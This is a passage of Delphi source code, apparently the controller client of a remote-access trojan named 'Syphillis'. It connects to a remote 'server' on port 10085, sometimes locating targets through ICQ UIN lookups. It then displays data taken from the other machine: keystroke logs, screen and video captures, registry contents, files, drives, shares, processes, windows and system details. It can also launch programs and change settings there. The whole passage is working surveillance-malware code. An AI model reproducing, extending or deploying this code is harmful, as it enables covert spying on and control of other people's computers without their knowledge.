if uppercase(segments[1]) = 'PROCLIST' then Form51.Show else

Result := 'Invalid WINDOW command: ' + Uppercase(segments[1]);

end else

if uppercase(segments[0]) = 'ABORT' then
AbortAlias := true else

if uppercase(segments[0]) = 'DEBUG' then
Result := IntToStr(Length(FloatingButtons)) else

if uppercase(segments[0]) = 'SKIN' then
LoadSkin(SkinsDir + segments[1] + '.ssk') else

if uppercase(segments[0]) = 'TREE' then
Result := AddTree(segments[1]) else

if uppercase(segments[0]) = 'CLEARTREE' then
TreeView1.Items.Clear else

if uppercase(segments[0]) = 'CLEAR' then
Form35.Memo1.Lines.Clear else

if uppercase(segments[0]) = 'EXEC' then
begin
if segments.count > 2 then
Result := ExecuteScript(segments[1], segments[2]) else
Result := ExecuteScript(segments[1], '');
end else

if uppercase(segments[0]) = 'FLOAT' then
begin

if segments.count < 5 then
Result := 'Syntax error. Use FLOAT X Y CAPTION COMMAND.' else
begin
try
CreateFloatingButton(StrToInt(Segments[1]), StrToInt(Segments[2]), Segments[3], Segments[4]);
except
Result := 'Syntax error. Use FLOAT X Y CAPTION COMMAND.';
end;
end;

end else

if uppercase(segments[0]) = 'PING' then
begin

UIN := true;

try
StrToInt(segments[1]);
except
UIN := false;
end;

if UIN then segments[1] := UINtoIP(segments[1], Form2.ICQAPI);
if segments[1] = '' then
Reply := Reply + 'Failed: ICQ reported a bad IP address.' + #13#10;

if Listener.State = wsClosed then
begin
Listener.Port := GetPort('udp');
Listener.Addr := '0.0.0.0';
Listener.Proto := 'UDP';
Listener.Listen;
end;

Reply := Reply + 'Pinging ' + segments[1] + '...' + #13#10;
Form2.SendPacketTo(segments[1], '10085', 'syph_query' + #0 + Listener.Port + #0);

end else

if uppercase(segments[0]) = 'DISCONNECT' then
Disconnect1.Click else

if uppercase(segments[0]) = 'RECONNECT' then
Reconnect1.Click else

if uppercase(segments[0]) = 'GETPORT' then
begin

if segments.count = 1 then
Result := 'Syntax error. Use GETPORT TCP or GETPORT UDP' else
if uppercase(segments[1]) = 'TCP' then
Reply := Reply + 'Next dynamic TCP port: ' + GetPort('TCP') + #13#10 else
if uppercase(segments[1]) = 'UDP' then
Reply := Reply + 'Next dynamic UDP port: ' + GetPort('UDP') + #13#10 else
Result := 'Syntax error. Use GETPORT TCP or GETPORT UDP';

end else

if uppercase(segments[0]) = 'CONNECT' then
begin

case Segments.Count of
2: ConnectTo(segments[1], '');
3: ConnectTo(segments[1], segments[2]);
else Result := 'Syntax error. Use CONNECT IP/DNS/UIN[:PORT] [PASSWORD]';
end;

end else

if uppercase(segments[0]) = 'QUIT' then
Application.Terminate else

if uppercase(segments[0]) = 'UNALIAS' then
begin
Seg := RemoveAlias(segments[1]);

if Seg <> '' then
Reply := Reply + Seg + #13#10;

end else

if uppercase(segments[0]) = 'ALIAS' then
begin
Seg := '';

for i := 2 to Segments.Count - 1 do
Seg := Seg + Segments[i] + ' ';

SetLength(Seg, Length(Seg) - 1);

Seg := AddAlias(segments[1], seg);

if Seg <> '' then
Reply := Reply + Seg + #13#10;

end else

if uppercase(segments[0]) = 'RECEIVE' then
begin
SetLength(SendData, Segments.count - 1);

for i := 1 to segments.count - 1 do
SendData[i - 1] := segments[i];

Receive(SendData);

end else

if uppercase(segments[0]) = 'SEND' then
begin
SetLength(SendData, Segments.count - 1);

for i := 1 to segments.count - 1 do
SendData[i - 1] := segments[i];

Send(SendData);

end else

if AliasExists(segments[0]) then

begin
if not AbortAlias then

Result := ScriptCommand(GetAlias(segments[0]), Reply) else

AbortAlias := false;
end else

Result := 'Unknown command: ' + Uppercase(segments[0]);

///////////////////////////////////////////////////////

Segments.Free;

SetLength(Reply, Length(Reply) - 2);

end;

function TForm1.RemoveAlias(AName: string): string;
var i: integer;
begin

Result := '';

for i := 0 to AliasNames.Count - 1 do
if Uppercase(AliasNames[i]) = Uppercase(AName) then
begin
Result := StringLength(AliasNames[i], 29) + ' != ' + AliasCommands[i];
AliasNames.Delete(I);
AliasCommands.Delete(I);
Exit;
end;

end;

function TForm1.AliasExists(AName: string): boolean;
var i: integer;
begin

Result := false;

for i := 0 to AliasNames.Count - 1 do
if Uppercase(AliasNames[i]) = Uppercase(AName) then
begin
Result := true;
Break;
end;

end;

function TForm1.GetAlias(AName: string): string;
var i: integer;
begin

Result := '';

for i := 0 to AliasNames.Count - 1 do
if Uppercase(AliasNames[i]) = Uppercase(AName) then
begin
Result := AliasCommands[i];
Break;
end;

end;

function TForm1.AddAlias(AName, ACommand: string): string;
var i: integer;
begin

Result := StringLength(Aname, 30) + ' = ' + Acommand;

for i := 0 to AliasNames.Count - 1 do
if Uppercase(AliasNames[i]) = Uppercase(AName) then
begin
AliasNames[i] := AName;
AliasCommands[i] := ACommand;
Exit;
end;

AliasNames.Add(AName);
AliasCommands.Add(ACommand);

end;

procedure TForm1.Receive(Segments: Array of String);
var S, ImageName: string;
    MenuItem: TMenuItem;
    I: integer;
    MS: TMemoryStream;
begin

if segments[0] = 'CapStream' then
begin

MS := TMemoryStream.Create;
MS.Write(Segments[1][1], Length(Segments[1]));

Form9.Image1.Picture.Bitmap.LoadFromStream(MS);

MS.Free;

end;

if segments[0] = 'XIH' then
begin
Form47.StatusBar1.SimpleText := '';
end;

if segments[0] = 'IHX' then
begin
Form47.StatusBar1.SimpleText := 'Downloading... 0%';
HistCount := StrToInt(Segments[1]);
end;

if segments[0] = 'IH' then
begin
with Form47.ListView1.Items.Add do
begin
Caption := DateTimeToStr(StrToFloat(segments[1]));
SubItems.Add(segments[2]);
SubItems.Add(segments[3]);
end;

Form47.StatusBar1.SimpleText := 'Downloading... ' + IntToStr(((Form47.ListView1.Items.Count - 1) * 100) div HistCount) + '%';
end;

if segments[0] = 'KL' then
begin

Form46.Label1.Caption := '';
Form46.Panel1.Font.Color := clBlack;
Form46.Panel2.Font.Color := clBlack;
Form46.Panel3.Font.Color := clBlack;

if segments[1] = '1' then
Form46.Panel1.Color := clLime else
Form46.Panel1.Color := clGreen;

if segments[2] = '1' then
Form46.Panel2.Color := clLime else
Form46.Panel2.Color := clGreen;

if segments[3] = '1' then
Form46.Panel3.Color := clLime else
Form46.Panel3.Color := clGreen;

end;

if segments[0] = 'XQC' then
Form45.StatusBar1.SimpleText := '';

if segments[0] = 'QC' then
with Form45.ListView1.Items.Add do
begin
Caption := segments[1];
SubItems.Add(segments[2]);
end;

if segments[0] = 'XNS' then
Form44.StatusBar1.SimpleText := '';

if segments[0] = 'NS' then
with Form44.ListView1.Items.Add do
begin
if Segments[1] = '0' then
ImageIndex := siShareDrive else
ImageIndex := siSharePrinter;

Caption := segments[2];
SubItems.Add(segments[3]);
SubItems.Add(segments[4]);
SubItems.Add(segments[5]);
SubItems.Add(segments[6]);
end;

if segments[0] = 'SnfS' then
Form17.StatusBar1.SimpleText := segments[1];

if segments[0] = 'BFS' then
Form41.StatusBar1.SimpleText := segments[1];

if segments[0] = 'SKS' then
Form40.StatusBar1.SimpleText := segments[1];

if segments[0] = 'XStrm' then
begin
Form9.View1.Enabled := true;
Form9.CaptureStillFrame1.Enabled := true;
Form9.CancelDownload1.Enabled := false;
Form9.Capture2.Enabled := true;
Form9.StopStreaming1.Enabled := false;
Form9.StartRecording1.Enabled := true;
Form9.StopRecording1.Enabled := false;
DeleteFile(ImageName);

IncomingCapture.Free;
StreamSize := '';
StreamSizeMode := True;

Form9.StatusBar1.SimpleText := '';
end;

if segments[0] = 'XAICQ' then
Form43.StatusBar1.SimpleText := '';

if segments[0] = 'Cur' then
Form39.StatusBar1.SimpleText := 'Successfully changed cursor.';

if segments[0] = 'SCur' then
Form39.StatusBar1.SimpleText := 'Successfully restored cursor.';

if segments[0] = 'XCur' then
Form39.StatusBar1.SimpleText := 'Failed: ' + segments[1];

if segments[0] = 'DFile' then
begin
Form33.Close;
Form34.Close;
end;

if segments[0] = 'XDFile' then
begin
Form33.Label3.Caption := '';
Form34.Label3.Caption := '';
MessageDlg(segments[1], mtError, [mbOk], 0);
end;

if segments[0] = 'XXRW' then
begin
MessageDlg('Error writing value: most likely, the key does not exist.', mtError, [mbOk], 0);
Form26.Label4.Caption := 'Error writing value.';
end;

if segments[0] = 'XRW' then
Form26.Close;

if segments[0] = 'XRR' then
begin
MessageDlg('Error reading value: most likely, the value does not exist. If you are reading the default value of a key, most likely, no default value has been assigned.', mtError, [mbOk], 0);
Form26.Close;
end;

if segments[0] = 'RR' then
begin
S := '';
for i := 1 to Length(segments[1]) do
S := S + IntToHex(Ord(segments[1][i]), 2) + ' ';
SetLength(S, Length(S) - 1);

Form26.Edit3.Text := s;
Form26.Edit4.Text := segments[1];
Form26.Edit4.Modified := false;
Form26.Label4.Caption := '';
end;

if segments[0] = 'KLS' then
begin
CurrentKey := segments[1];
KeyCount := StrToInt(segments[2]);
Form32.StatusBar1.SimpleText := 'Downloading... 0%';
end;

if segments[0] = 'XXKL' then
begin
Form32.StatusBar1.SimpleText := 'Invalid key';
MessageDlg('Error opening key: most likely, the key does not exist.', mtError, [mbOk], 0);
end;

if segments[0] = 'XKL' then
Form32.StatusBar1.SimpleText := IntToRootKey(CurrentRootKey) + CurrentKey;

// ====================================================== //

if (segments[0] = 'RS') or (segments[0] = 'RB') or (segments[0] = 'RK') then
with Form32.ListView1.Items.Add do
begin

Caption := Segments[1];

if ((segments[0] = 'RS') or (segments[0] = 'RB')) and (Segments[1] = '') then
begin
Caption := '(Default Value)';

if segments[0] = 'RS' then ImageIndex := siRegistryDefString else
ImageIndex := siRegistryDefBinary;

end else
if segments[0] = 'RS' then ImageIndex := siRegistryString else
if segments[0] = 'RB' then ImageIndex := siRegistryBinary else
if segments[1] = '..' then
begin
Caption := 'Parent Key';
ImageIndex := siRegistryParent;
end
else
ImageIndex := siRegistryFolder;

Form32.StatusBar1.SimpleText := 'Downloading... ' + IntToStr(((Form32.ListView1.Items.Count - 1) * 100) div KeyCount) + '%';

end;

// ====================================================== //

if segments[0] = 'XCPs' then
Form31.StatusBar1.SimpleText := '';

if segments[0] = 'CPs' then
with Form31.ListView1.Items.Add do
begin
Caption := segments[1];
SubItems.Add(segments[2]);
end;

// ====================================================== //

if segments[0] = 'XCPUI' then
Form30.StatusBar1.SimpleText := '';

if segments[0] = 'CPUI' then
with Form30.ListView1.Items.Add do
begin
Caption := segments[1];
SubItems.Add(segments[2]);
end;

// ====================================================== //

if segments[0] = 'XACap' then
begin

Form9.StatusBar1.SimpleText := 'Wait...';
ImageName := SaveDir + 'capture.gif';

Form9.FtpClient1.LocalFileName := Imagename;
Form9.FTPClient1.HostDirName := WinSysPath;
Form9.FtpClient1.HostFileName := 'shell32.c' + CustomFileExt;
Form9.FTPClient1.Cwd;
Form9.FTPClient1.Size;
FileSize := Form9.FTPClient1.SizeResult;

DeleteFile(ImageName);

if messageDlg('Recorded file is ' + BytesToText(FileSize) + ', continue with download?', mtConfirmation, [mbYes, mbNo], 0) = mrYes then
begin

if Form9.FTPClient1.Get then
begin

if not StopCapDownload then
begin
Form9.Image1.Hide;
Form9.Image1.Picture.Assign(nil);
Form9.GIFImage1.Show;
Form9.GIFImage1.Image.LoadFromFile(ImageName);

Form28.TrackBar1.Position := Form9.GifImage1.FrameIndex + 1;
Form28.TrackBar1.Max := Form9.GifImage1.Image.Count;
Form28.Label1.Caption := IntToStr(Form9.GifImage1.FrameIndex + 1) + '/' + IntToStr(Form9.GifImage1.Image.Count);
Form28.Show;
end;

end else
MessageDlg('Error: ' + Form9.FTPClient1.ErrorMessage, mtError, [mbOk], 0);

end;

Form9.StatusBar1.SimpleText := '';
DeleteFile(ImageName);

Form9.View1.Enabled := true;
Form9.CaptureStillFrame1.Enabled := true;
Form9.CancelDownload1.Enabled := false;
Form9.Capture2.Enabled := true;
Form9.StopStreaming1.Enabled := false;
Form9.StartRecording1.Enabled := true;
Form9.StopRecording1.Enabled := false;

end;

// ====================================================== //

if segments[0] = 'Ch' then
begin
Form24.Memo1.Lines.Add(Form24.ListView1.Items[StrToInt(Segments[1]) - 1].Caption + ':');
Form24.Memo1.Lines.Add('     ' + segments[2]);
Form24.Memo1.Lines.Add('');
end;

if segments[0] = 'Cl+' then
with Form24.ListView1.Items.Add do
begin
Caption := Segments[1];
ImageIndex := siChatInactive;
end;

if segments[0] = 'Cl-' then
Form24.ListView1.Items.Delete(StrToInt(Segments[1]) - 1);

if segments[0] = 'Ch+' then
Form24.ListView1.Items[StrToInt(Segments[1]) - 1].ImageIndex := siChatActive;

if segments[0] = 'Ch-' then
Form24.ListView1.Items[StrToInt(Segments[1]) - 1].ImageIndex := siChatInactive;

// ====================================================== //

if segments[0] = 'Cli' then
begin

while Form24.ListView1.Items.Count < StrToInt(segments[1]) do
Form24.ListView1.Items.Add;

with Form24.ListView1.Items[StrToInt(Segments[1]) - 1] do
begin
Caption := Segments[2];

if Segments[3] = '0' then
ImageIndex := siChatInactive else
ImageIndex := siChatActive;

end;

end;

if segments[0] = 'XLP' then
Form23.StatusBar1.SimpleText := 'Successfully launched program.';

if segments[0] = 'XXLP' then
Form23.StatusBar1.SimpleText := 'Failed: ' + Segments[1];

// ====================================================== //

if segments[0] = 'ACStat' then
Form9.StatusBar1.SimpleText := Segments[1];

// ====================================================== //

if segments[0] = 'FFD' then
Form25.StatusBar1.SimpleText := 'Searching... ' + segments[1];

if segments[0] = 'XFF' then
begin
Form25.StatusBar1.SimpleText := '';
Form25.Button1.Caption := 'Start';
end;

if segments[0] = 'FF' then
with Form25.ListView1.Items.Add do
begin
S := UpperCase(ExtractFileExt(Segments[1]));
Caption := Segments[1];
ImageIndex := ExtToIndex(S);
end;

// ====================================================== //

if segments[0] = 'XSUDP' then
Form14.Label1.Caption := '';

if segments[0] = 'TNEmuP' then
StartProgram('Telnet.exe', RemoteIP + ' ' + Segments[1], true);

if segments[0] = 'TNEmuStat' then
Form19.StatusBar1.SimpleText := Segments[1];

// ====================================================== //

if segments[0] = 'PS' then
with Form17.ListView4.Items.Add do
begin
Caption := Segments[1];
SubItems.Add(Segments[2]);
SubItems.Add(Segments[3]);
SubItems.Add(Segments[4]);
end;

// ====================================================== //

if segments[0] = 'C' then
with Form18.ListView3.Items.Add do
begin
Caption := segments[1];
SubItems.Add(Segments[2]);
SubItems.Add(Segments[3]);
SubItems.Add(Segments[4]);
end;

if segments[0] = 'XC' then
Form18.StatusBar1.SimpleText := '';

// ====================================================== //

if segments[0] = 'UDPStat' then
Form13.StatusBar1.SimpleText := Segments[1];

if segments[0] = 'UDP' then
with Form13.ListView6.Items.Add do
begin
Caption := Segments[1];
SubItems.Add(Segments[2]);
end;

if segments[0] = 'Adp' then
begin
MenuItem := TMenuItem.Create(Form17.Start1);
MenuItem.Caption := Segments[1];
MenuItem.OnClick := Form17.Sniff;
Form17.Start1.Add(MenuItem);
end;

// ====================================================== //

if segments[0] = 'FListStat' then
begin
CurrentDir := segments[1];
FileCount := StrToInt(segments[2]);
SetLength(EntryTypes, FileCount);
Form12.ListView1.Items.BeginUpdate;
Form12.StatusBar1.SimpleText := 'Downloading... 0%';
end;

if segments[0] = 'XXFList' then
begin
Form12.ListView1.Items.EndUpdate;
Form12.StatusBar1.SimpleText := 'Invalid directory';
MessageDlg('Error opening directory: most likely, the directory does not exist.', mtError, [mbOk], 0);
end;

if segments[0] = 'XFList' then
begin
Form12.ListView1.Items.EndUpdate;
Form12.StatusBar1.SimpleText := CurrentDir;
end;

// ====================================================== //

if segments[0] = 'DD' then
with Form22.ListView1.Items.Add do
begin
Caption := Segments[1] + ':\';
SubItems.Add(Segments[2]);

case StrToInt(Segments[3]) of
0: begin
SubItems.Add('Removable Disk');
ImageIndex := siDriveRemovable;
end;
1: begin
SubItems.Add('Fixed Disk');
ImageIndex := siDriveFixed;
end;
2: begin
SubItems.Add('Network Drive');
ImageIndex := siDriveNetwork;
end;
3: begin
SubItems.Add('RAM Drive');
ImageIndex := siDriveRAM;
end;
4: begin
SubItems.Add('CD-ROM Drive');
ImageIndex := siDriveCD;
end;
end;

SubItems.Add(Segments[4]);
end;

if segments[0] = 'XDD' then
Form22.StatusBar1.SimpleText := '';

// ====================================================== //

if (segments[0] = 'F') or (segments[0] = 'D') then
begin

with Form12.ListView1.Items.Add do
begin

S := UpperCase(ExtractFileExt(Segments[1]));
Caption := Segments[1];

if segments[0] = 'F' then
begin
ImageIndex := ExtToIndex(S);
EntryTypes[Index] := 3;
end
else
begin

if segments[1] = '..' then
begin
Caption := 'Parent Directory';
ImageIndex := siFileParent;
EntryTypes[Index] := 1;
end
else
ImageIndex := siFileFolder;
EntryTypes[Index] := 2;
end;

Form12.StatusBar1.SimpleText := 'Downloading... ' + IntToStr(((Form12.ListView1.Items.Count - 1) * 100) div FileCount) + '%';
end;

end;

// ====================================================== //

if segments[0] = 'XML' then
Form52.StatusBar1.SimpleText := '';

if segments[0] = 'ML' then
with Form52.ListView1.Items.Add do
begin
Caption := segments[1];
ImageIndex := siModule;
end;

if segments[0] = 'XPL' then
Form51.StatusBar1.SimpleText := '';

if segments[0] = 'PL' then
with Form51.ListView1.Items.Add do
begin
Caption := segments[1];
ImageIndex := siProcess;
Form51.Memo1.Lines.Add(segments[2]);
end;

if segments[0] = 'XW' then
Form11.StatusBar1.SimpleText := '';

if segments[0] = 'W' then
with Form11.ListView1.Items.Add do
begin
Caption := segments[1];

if Segments[2] = '0' then
ImageIndex := siAppVisible else
if Segments[2] = '1' then
ImageIndex := siAppInvisible else
if Segments[2] = '2' then
ImageIndex := siAppActive;

Form11.Memo1.Lines.Add(segments[3]);
end;

if segments[0] = 'XRW' then
Form29.StatusBar1.SimpleText := '';

if segments[0] = 'RW' then
with Form29.ListView1.Items.Add do
begin
Caption := segments[1];

if Segments[2] = '0' then
ImageIndex := siAppVisible else
if Segments[2] = '1' then
ImageIndex := siAppInvisible else
if Segments[2] = '2' then
ImageIndex := siAppActive;

Form29.Memo1.Lines.Add(segments[3]);
end;

// ====================================================== //

if segments[0] = 'XA' then
Form10.StatusBar1.SimpleText := '';

if segments[0] = 'A' then
with Form10.ListView1.Items.Add do
begin
Caption := segments[1];

if Segments[2] = '0' then
ImageIndex := siAppVisible else
if Segments[2] = '1' then
ImageIndex := siAppInvisible else
if Segments[2] = '2' then
ImageIndex := siAppActive;

Form10.Memo1.Lines.Add(segments[3]);
end;

// ====================================================== //

if segments[0] = 'XXXICQI' then
MessageDlg('ICQ does not appear to be installed on the server.', mtWarning, [mbOk], 0);

if segments[0] = 'XXICQI' then
MessageDlg('ICQ does not appear to be open on the server. Some information could not be gathered.', mtWarning, [mbOk], 0);

if segments[0] = 'XICQI' then
Form42.StatusBar1.SimpleText := '';

if segments[0] = 'ICQI' then
with Form42.ListView1.Items.Add do
begin
Caption := segments[1];
SubItems.Add(segments[2]);
end;

if segments[0] = 'XInfo' then
Form8.StatusBar1.SimpleText := '';

if segments[0] = 'Info' then
with Form8.ListView1.Items.Add do
begin
Caption := segments[1];
SubItems.Add(segments[2]);
end;

if segments[0] = 'XNInfo' then
Form20.StatusBar1.SimpleText := '';

if segments[0] = 'NInfo' then
with Form20.ListView5.Items.Add do
begin
Caption := segments[1];
SubItems.Add(segments[2]);
end;

// ====================================================== //

if segments[0] = 'KK' then
Form5.Memo1.Lines.Add('');

if segments[0] = 'K' then
Form5.Memo1.Lines[Form5.Memo1.Lines.Count - 1] :=
Form5.Memo1.Lines[Form5.Memo1.Lines.Count - 1] + segments[1];

if segments[0] = 'XK' then
begin

if Length(Form5.Memo1.Lines[Form5.Memo1.Lines.Count - 1]) = 0 then
Form5.Memo1.Lines.Delete(Form5.Memo1.Lines.Count - 1) else
begin
S := Form5.Memo1.Lines[Form5.Memo1.Lines.Count - 1];
SetLength(S, Length(Form5.Memo1.Lines[Form5.Memo1.Lines.Count - 1]) - 1);
Form5.Memo1.Lines[Form5.Memo1.Lines.Count - 1] := S;
end;

end;

// ====================================================== //

if segments[0] = 'SyphSrv' then
begin

if segments[2] = '1' then
begin

if RemotePassword = '' then
begin

if Form7.ShowModal = mrCancel then
begin
WSocket1.Abort;
SetStatus('Failed: Connection was aborted.');
Exit;
end;

end else
Form7.Edit1.Text := RemotePassword;

ServerPwd := Form7.Edit1.Text;

end else ServerPwd := '';

SetStatus('Connected to ' + RemoteIP + ' (' + Segments[1] + '), logging in...');
Send(['SyphCli', ServerPwd, Nickname, SyphillisVer]);
RemoteVer := Segments[1];

end;

if segments[0] = 'Access' then
begin

if segments[1] = '1' then
begin
SetStatus('Connected to ' + RemoteIP + ' (' + RemoteVer + ').');
TreeView1.Show;
Panel1.Hide;

CurrentDir := 'C:\';
CurrentKey := '\';
CurrentRootKey := 2;

StopCapDownload := false;
ScaleFactor := 4;

ResX := StrToInt(segments[2]);
ResY := StrToInt(Segments[3]);
CustomFileExt := Segments[4];
WinSysPath := Segments[5];

Form9.ClientWidth := (ResX div ScaleFactor) + 4;
Form9.ClientHeight := (ResY div ScaleFactor) + 4 + Form9.StatusBar1.Height;

end else
begin
WSocket1.Abort;
SetStatus('Failed: Connection was refused.');
end;

end;

// ====================================================== //

end;

procedure TForm1.ProcessQueue;
var i, Size: integer;
    S, Data: String;
    ArrayData: array of string;
begin

if Length(MessageQueue) > 0 then
if not ProcessingQueue then
begin
ProcessingQueue := true;

Data := MessageQueue[0];

while true do
if Length(Data) > 0 then
begin

S := Copy(Data, 1, 4);
Size := Ord(S[1]) + 256 * Ord(S[2]) + 65536 * Ord(S[3]) + 16777216 * Ord(S[4]);

SetLength(ArrayData, Length(ArrayData) + 1);
ArrayData[Length(ArrayData) - 1] := Copy(Data, 5, Size);

Data := Copy(Data, Size + 5, Length(Data));

end else
Break;

for i := 1 to Length(MessageQueue) - 1 do
MessageQueue[i - 1] := MessageQueue[i];
SetLength(MessageQueue, Length(MessageQueue) - 1);

Receive(ArrayData);

ProcessingQueue := false;
ProcessQueue;
end;

end;

procedure TForm1.Send(Data: array of String);

function NumberToString(N: integer): string;
begin
SetLength(Result, 4);
Result[1] := Chr(n and $FF);
Result[2] := Chr((n shr 8) and $FF);
Result[3] := Chr((n shr 16) and $FF);
Result[4] := Chr((n shr 24) and $FF);
end;

var i: integer;
    Text: string;
begin

if WSocket1.State <> wsConnected then
begin
MessageDlg('Failed: Couldn''t send command: "' + Data[0] + '", not connected to a server.', mtError, [mbOk], 0);
Exit;
end;

Text := '';

for i := 0 to Length(Data) - 1 do
Text := Text + NumberToString(Length(Data[i])) + Data[i];

Text := NumberToString(Length(Text)) + Text;

WSocket1.SendStr(Text);

end;

procedure TForm1.SetStatus(status: String);
begin
StatusBar1.Panels[2].Text := Status;
Form35.Memo1.Lines.Add(Status);
end;

procedure TForm1.ConnectTo(RemoteHost, Password: String);
var IsAUIN: boolean;
begin

if WSocket1.State <> wsClosed then
if MessageDlg('Break the current connection?', mtConfirmation, [mbYes, mbNo], 0) = mrNo then
Exit;

SetStatus('Closing current connection...');
WSocket1.Abort;

try
IsaUIN := true;
StrToInt(RemoteHost);
except
IsaUIN := false;
end;

if IsAUIN then
begin
SetStatus('Looking up IP address...');
RemoteHost := UINtoIP(RemoteHost, Form2.ICQAPI);

if RemoteHost = '' then
begin
SetStatus('Failed: ICQ reported a bad IP address.');
Exit;
end;

end;

SetLength(MessageQueue, 0);
CurrentMessage := '';

Form24.ListView1.Items.BeginUpdate;
Form24.ListView1.Items.Clear;
Form24.ListView1.Items.EndUpdate;

Reconnect1.Enabled := true;
ReconnectIP := RemoteHost;
RemoteIP := RemoteHost;
RemotePassword := Password;

StatusBar1.Panels[0].Text := '0';
StatusBar1.Panels[1].Text := '0';
SetStatus('Connecting to ' + RemoteHost + '...');

WSocket1.Port := '10085';
WSocket1.Addr := RemoteHost;
WSocket1.Proto := 'tcp';
Connecting := True;
WSocket1.Connect;
end;

procedure TForm1.Exit1Click(Sender: TObject);
begin
Close;
end;

procedure TForm1.QuickConnect1Click(Sender: TObject);
begin
if Form3.ShowModal = mrOK then
ConnectTo(Form3.Edit1.Text, '');
end;

procedure TForm1.WSocket1SessionConnected(Sender: TObject; Error: Word);
begin

if Error = 0 then
begin
Connecting := false;
SetStatus('Connected to ' + RemoteIP + ', negotiating...');
end
else
begin
SetStatus('Failed: Couldn''t connect to ' + RemoteIP + '.');
RemoteIP := '';
end;

end;

procedure TForm1.WSocket1DataAvailable(Sender: TObject; Error: Word);
var Size: integer;
    S, data: string;
begin

Data := WSocket1.ReceiveStr;

StatusBar1.Panels[1].Text := IntToStr(StrToInt(StatusBar1.Panels[1].Text) + Length(Data));

CurrentMessage := CurrentMessage + Data;

while true do
if Length(CurrentMessage) >= 4 then
begin

S := Copy(CurrentMessage, 1, 4);
Size := Ord(S[1]) + 256 * Ord(S[2]) + 65536 * Ord(S[3]) + 16777216 * Ord(S[4]);

if Length(CurrentMessage) >= (Size + 4) then
begin
SetLength(MessageQueue, Length(MessageQueue) + 1);
MessageQueue[Length(MessageQueue) - 1] := Copy(CurrentMessage, 5, Size);

CurrentMessage := Copy(CurrentMessage, Size + 5, Length(CurrentMessage));
end;

end else
Break;

ProcessQueue;

end;

procedure TForm1.FormCreate(Sender: TObject);
begin
Form38.Label1.Caption := 'Creating Buffers...';

Application.OnMessage := AppMessage;
ListeningBuf := TStringList.Create;
ListeningIP := TStringList.Create;
Sweeplist := TStringList.Create;
AliasNames := TStringList.Create;
AliasCommands := TStringList.Create;

Form38.Label1.Caption := 'Loading Settings...';

SkinsDir := ExtractFileDir(ParamStr(0)) + '\SKINS\';
SaveDir := ExtractFileDir(ParamStr(0)) + '\FILES\';
ToolsDir := ExtractFileDir(ParamStr(0)) + '\TOOLS\';
ScriptDir := ExtractFileDir(ParamStr(0)) + '\SCRIPTS\';
TreeDir := ExtractFileDir(ParamStr(0)) + '\TREES\';

StatusBar1.SimpleText := 'Localhost: ' + LocalHostName + ' (' + LocalIP + ')';
Caption := 'Syphillis - ' + SyphillisVer;
Sweeplist.LoadFromFile(SaveDir + 'ServerList.txt');
DoubleBuffered := true;

Form38.Label1.Caption := 'Loading Menus...';
UpdateDynamicMenus;

with TRegistry.Create do
begin
RootKey := HKEY_LOCAL_MACHINE;
OpenKey('Software\Microsoft\Windows\CurrentVersion', true);
DefaultID := ReadString('RegisteredOwner');
CloseKey;
RootKey := HKEY_CURRENT_USER;
OpenKey('Software\Syphillis', True);
CloseKey;
Free;
end;

end;

procedure TForm1.SaveSettings;
begin

with TIniFile.Create(SaveDir + 'Config.ini') do
begin
WriteInteger('Syphillis', 'Top', Top);
WriteInteger('Syphillis', 'Left', Left);
WriteInteger('Syphillis', 'Width', Width);
WriteInteger('Syphillis', 'Height', Height);
WriteInteger('Syphillis', 'CTop', Form35.Top);
WriteInteger('Syphillis', 'CLeft', Form35.Left);
WriteInteger('Syphillis', 'CWidth', Form35.Width);
WriteInteger('Syphillis', 'CHeight', Form35.Height);
WriteBool('Syphillis', 'CVisible', Form35.Visible);
WriteString('Syphillis', 'QuickConnect', Form3.Edit1.Text);
WriteBool('Syphillis', 'ShowICQErrors', ShowICQErrors);
WriteString('Syphillis', 'Username', Nickname);
WriteInteger('Syphillis', 'CapQuality', CapQuality);
WriteInteger('Syphillis', 'StreamQuality', StreamQuality);
WriteInteger('Syphillis', 'AniFPS', AniFrameDelay);
WriteInteger('Syphillis', 'UDPPassCount', PassCount);
WriteInteger('Syphillis', 'ScriptDelay', ScriptDelay);
WriteBool('Syphillis', 'AutoRunScript', AutorunScript);
WriteBool('Syphillis', 'AutoCloseScript', AutocloseScript);
WriteString('Syphillis', 'TreeFile', CurrentTree);
WriteString('Syphillis', 'SkinFile', CurrentSkin);
Free;
end;

Sweeplist.SaveToFile(SaveDir + 'ServerList.txt');

end;

procedure TForm1.FormDestroy(Sender: TObject);
begin
ListeningIP.Free;
ListeningBuf.Free;
Sweeplist.Free;
AliasNames.Free;
AliasCommands.Free;
end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
HttpCli1.Abort;
SaveSettings;
end;

procedure TForm1.Widget1Click(Sender: TObject);
begin
Application.Minimize;
ShowWindow(Application.Handle, SW_HIDE);
RxTrayIcon1.Active := true;
end;

procedure TForm1.RxTrayIcon1DblClick(Sender: TObject);
begin
Application.Restore;
ShowWindow(Application.Handle, SW_SHOW);
RxTrayIcon1.Active := false;
end;

procedure TForm1.FormShow(Sender: TObject);
const done: boolean = false;
var s: string;
begin

if not Done then
begin
Done := true;

Form38.Label1.Caption := 'Loading Settings...';

with TIniFile.Create(SaveDir + 'Config.ini') do
begin
Top := ReadInteger('Syphillis', 'Top', 144);
Left := ReadInteger('Syphillis', 'Left', 8);
Width := ReadInteger('Syphillis', 'Width', 0);
Height := ReadInteger('Syphillis', 'Height', 0);
Form35.Top := ReadInteger('Syphillis', 'CTop', 8);
Form35.Left := ReadInteger('Syphillis', 'CLeft', 8);
Form35.Width := ReadInteger('Syphillis', 'CWidth', Screen.Width - 16);
Form35.Height := ReadInteger('Syphillis', 'CHeight', 128);
Form35.Visible := ReadBool('Syphillis', 'CVisible', true);
Form3.Edit1.Text := ReadString('Syphillis', 'QuickConnect', '127.0.0.1');
ShowICQErrors := ReadBool('Syphillis', 'ShowICQErrors', true);
Nickname := ReadString('Syphillis', 'Username', '');
CapQuality := ReadInteger('Syphillis', 'CapQuality', 0);
StreamQuality := ReadInteger('Syphillis', 'StreamQuality', 25);
AniFrameDelay := ReadInteger('Syphillis', 'AniFPS', 500);
PassCount := ReadInteger('Syphillis', 'UDPPassCount', 3);
ScriptDelay := ReadInteger('Syphillis', 'ScriptDelay', 1);
AutoRunScript := ReadBool('Syphillis', 'AutoRunScript', true);
AutoCloseScript := ReadBool('Syphillis', 'AutoCloseScript', true);
CurrentTree := ReadString('Syphillis', 'TreeFile', 'Default.ssc');
